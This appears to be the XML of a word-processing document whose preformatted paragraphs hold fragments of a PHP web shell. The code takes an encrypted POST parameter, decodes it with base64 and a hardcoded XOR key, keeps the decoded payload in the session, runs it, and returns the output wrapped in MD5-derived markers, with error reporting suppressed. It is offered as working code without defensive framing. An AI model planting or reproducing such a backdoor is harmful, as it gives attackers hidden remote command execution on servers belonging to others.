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@session_sta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et_time_lim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@error_reporting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code($D,$K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$i=0;$i&lt;strlen($D);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 = $K[$i+1&amp;1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[$i] = $D[$i]^$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$pass=\'pass\';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>$payloadName=\'payload\';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>$key=\'3c6e0b8a9c15224a\'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isset($_POST[$pass]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=encode(base64_decode($_POST[$pass]),$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_SESSION[$payloadName]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ayload=encode($_SESSION[$payloadName],$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trpos($payload,\"getBasicsInfo\")===fals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payload=encode($payload,$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a l($paylo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substr(md5($pass.$key),0,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base64_encode(encode(@run($data),$ke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substr(md5($pass.$key),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trpos($data,\"getBasicsInfo\")!==fals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SESSION[$payloadName]=encode($data,$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